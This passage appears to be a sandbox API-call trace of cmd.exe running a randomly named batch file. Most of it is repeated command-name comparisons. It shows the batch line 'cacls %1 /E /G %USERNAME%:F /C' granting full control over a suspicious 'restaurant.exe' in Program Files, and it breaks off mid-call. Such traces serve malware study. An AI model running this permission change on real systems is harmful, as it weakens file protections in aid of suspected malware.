[0277.631] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0277.631] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0277.631] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0277.631] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0277.631] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0277.631] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0277.631] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0277.631] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0277.631] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0277.631] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0277.631] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0277.631] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0277.631] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0277.631] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0277.631] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0277.631] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0277.631] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0277.631] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0277.631] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0277.631] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0277.631] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0277.631] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0277.631] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0277.631] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0277.631] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0277.631] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0277.631] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0277.631] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0277.631] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0277.631] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0277.631] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0277.631] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0277.631] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0277.631] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0277.631] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0277.631] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0277.631] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0277.631] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0277.631] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0277.631] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0277.631] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0277.631] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0277.631] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0277.631] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0277.631] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0277.631] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0277.631] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0277.631] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0277.631] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0277.632] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0277.632] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0277.632] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0277.632] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0277.632] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0277.632] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0277.632] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0277.632] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0277.632] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0277.632] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0277.632] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0277.632] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0277.632] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0277.632] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0277.632] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0277.632] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0277.632] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0277.632] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0277.632] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0277.632] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0277.632] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0277.632] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0277.632] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0277.632] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0277.632] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0277.632] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0277.632] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0277.632] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0277.632] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0277.632] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0277.633] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0277.633] SetErrorMode (uMode=0x0) returned 0x0 [0277.633] SetErrorMode (uMode=0x1) returned 0x0 [0277.633] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x12705d0, lpFilePart=0xfcf1f4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfcf1f4*="Desktop") returned 0x1d [0277.633] SetErrorMode (uMode=0x0) returned 0x1 [0277.633] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0277.633] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0277.636] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.636] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0xfcefa0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcefa0) returned 0x127b158 [0277.636] FindClose (in: hFindFile=0x127b158 | out: hFindFile=0x127b158) returned 1 [0277.636] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0277.636] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0277.636] GetConsoleTitleW (in: lpConsoleTitle=0xfcf474, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0277.637] ApiSetQueryApiSetPresence () returned 0x0 [0277.637] ResolveDelayLoadedAPI () returned 0x745414a0 [0277.638] SaferWorker () returned 0x0 [0277.651] SetErrorMode (uMode=0x0) returned 0x0 [0277.651] SetErrorMode (uMode=0x1) returned 0x0 [0277.651] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0x127ad30, lpFilePart=0xfcf324 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xfcf324*="vRnqNMBW.bat") returned 0x2a [0277.651] SetErrorMode (uMode=0x0) returned 0x1 [0277.651] wcsspn (_String=" \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\"", _Control=" \x09") returned 0x1 [0277.651] CmdBatNotificationStub () returned 0x1 [0277.651] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcf3b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0277.651] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0277.651] _get_osfhandle (_FileHandle=3) returned 0xb4 [0277.651] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0277.651] _get_osfhandle (_FileHandle=3) returned 0xb4 [0277.652] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0277.652] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcf384, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcf384*=0xe2, lpOverlapped=0x0) returned 1 [0277.653] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0277.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0277.653] _get_osfhandle (_FileHandle=3) returned 0xb4 [0277.653] GetFileType (hFile=0xb4) returned 0x1 [0277.653] _get_osfhandle (_FileHandle=3) returned 0xb4 [0277.653] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0277.654] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0277.654] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0277.654] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0277.654] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0277.654] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0277.654] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0277.654] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0277.654] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0277.656] _tell (_FileHandle=3) returned 32 [0277.656] _close (_FileHandle=3) returned 0 [0277.656] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf148 | out: _Buffer="\r\n") returned 2 [0277.656] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.656] GetFileType (hFile=0x3c) returned 0x2 [0277.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.656] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf120 | out: lpMode=0xfcf120) returned 1 [0277.658] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.658] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf138, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf138*=0x2) returned 1 [0277.658] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0277.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0277.658] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfcf144 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0277.658] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfcf144 | out: _Buffer=">") returned 1 [0277.658] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.658] GetFileType (hFile=0x3c) returned 0x2 [0277.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.658] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf124 | out: lpMode=0xfcf124) returned 1 [0277.756] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.756] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfcf13c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfcf13c*=0x1e) returned 1 [0278.676] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.676] GetFileType (hFile=0x3c) returned 0x2 [0278.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0278.676] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3c4 | out: lpMode=0xfcf3c4) returned 1 [0278.881] _get_osfhandle (_FileHandle=1) returned 0x3c [0278.881] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12777c0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xfcf3dc, lpReserved=0x0 | out: lpBuffer=0x12777c0*, lpNumberOfCharsWritten=0xfcf3dc*=0x5) returned 1 [0279.061] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcf3e4 | out: _Buffer=" \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\" /E /G CIiHmnxMn6Ps:F /C ") returned 84 [0279.061] _get_osfhandle (_FileHandle=1) returned 0x3c [0279.061] GetFileType (hFile=0x3c) returned 0x2 [0279.061] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0279.061] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3bc | out: lpMode=0xfcf3bc) returned 1 [0280.355] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.355] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x54, lpNumberOfCharsWritten=0xfcf3d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3d4*=0x54) returned 1 [0280.597] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcf3f8 | out: _Buffer="\r\n") returned 2 [0280.597] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.597] GetFileType (hFile=0x3c) returned 0x2 [0280.597] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.597] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcf3d0 | out: lpMode=0xfcf3d0) returned 1 [0280.657] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.657] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcf3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcf3e8*=0x2) returned 1 [0280.680] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.680] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.680] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.680] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.680] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.680] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.680] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.680] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.680] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.680] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.680] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.680] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.680] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.680] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.680] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.680] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.680] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.680] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.680] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.680] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.680] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.680] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.680] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.680] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.680] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.680] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.680] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.680] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.680] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.680] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.680] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.680] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.680] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.680] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.680] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.680] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.680] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.680] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.680] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.680] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.680] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.680] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.680] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0280.681] SetErrorMode (uMode=0x0) returned 0x0 [0280.681] SetErrorMode (uMode=0x1) returned 0x0 [0280.681] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x127bea0, lpFilePart=0xfcf194 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfcf194*="Desktop") returned 0x1d [0280.681] SetErrorMode (uMode=0x0) returned 0x1 [0280.681] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.681] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.682] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.682] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0xffffffff [0280.683] GetLastError () returned 0x2 [0280.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.683] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0xffffffff [0280.683] GetLastError () returned 0x2 [0280.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0x1270b68 [0280.683] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0280.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0xffffffff [0280.684] GetLastError () returned 0x2 [0280.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xfcef20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfcef20) returned 0x1270b68 [0280.684] FindClose (in: hFindFile=0x1270b68 | out: hFindFile=0x1270b68) returned 1 [0280.684] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.684] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.684] GetConsoleTitleW (in: lpConsoleTitle=0xfcef68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.688] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.688] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.688] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.688] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.688] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.688] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.688] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.688] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.688] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.688] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.688] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.688] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.688] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.688] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.688] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.688] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.688] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.688] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.688] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.688] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.688] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.688] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.688] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.688] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.688] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.688] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.688] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.688] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.688] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.689] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.689] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.689] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.689] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.689] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.689] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.689] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.689] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.689] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.689] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.689] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.689] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0280.689] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0280.689] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0280.689] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0280.689] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0280.689] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0280.689] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0280.689] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0280.689] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0280.689] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0280.689] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0280.689] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0280.689] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0280.689] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0280.689] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0280.689] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0280.689] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0280.689] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0280.689] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0280.689] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0280.689] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0280.689] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0280.689] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0280.689] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0280.689] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0280.689] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0280.689] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0280.689] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0280.689] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0280.689] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0280.689] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0280.689] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0280.689] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0280.689] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0280.690] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0280.690] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0280.690] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0280.690] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0280.690] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0280.690] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0280.690] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0280.690] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0280.690] SetErrorMode (uMode=0x0) returned 0x0 [0280.690] SetErrorMode (uMode=0x1) returned 0x0 [0280.690] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x127c520, lpFilePart=0xfcea74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfcea74*="Desktop") returned 0x1d [0280.690] SetErrorMode (uMode=0x0) returned 0x1 [0280.690] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.690] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.690] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.690] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.690] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, 